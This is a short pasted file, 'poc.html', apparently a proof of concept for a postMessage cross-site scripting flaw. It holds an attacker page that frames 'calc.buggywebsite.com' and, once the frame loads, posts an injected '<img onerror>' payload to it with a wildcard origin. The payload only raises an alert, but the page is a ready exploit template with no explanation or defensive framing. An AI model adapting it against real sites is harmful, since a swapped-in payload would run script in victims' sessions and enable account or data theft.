poc.html
4 years ago by dzdz003 in Plain Text
<h1> This is attacker exploit page which loads the vulnerable site in an iframe</h1>
<script>
function SendMessage() {
var IframeElement = document.getElementById('VulnerableSiteIframe');
var msg = "<img src=x onerror=alert(document.domain)>";
IframeElement.contentWindow.postMessage(msg, '*');
};
</script>
<iframe id="VulnerableSiteIframe" height="600" width="1200" src="http://calc.buggywebsite.com/" onload="SendMessage()"></iframe>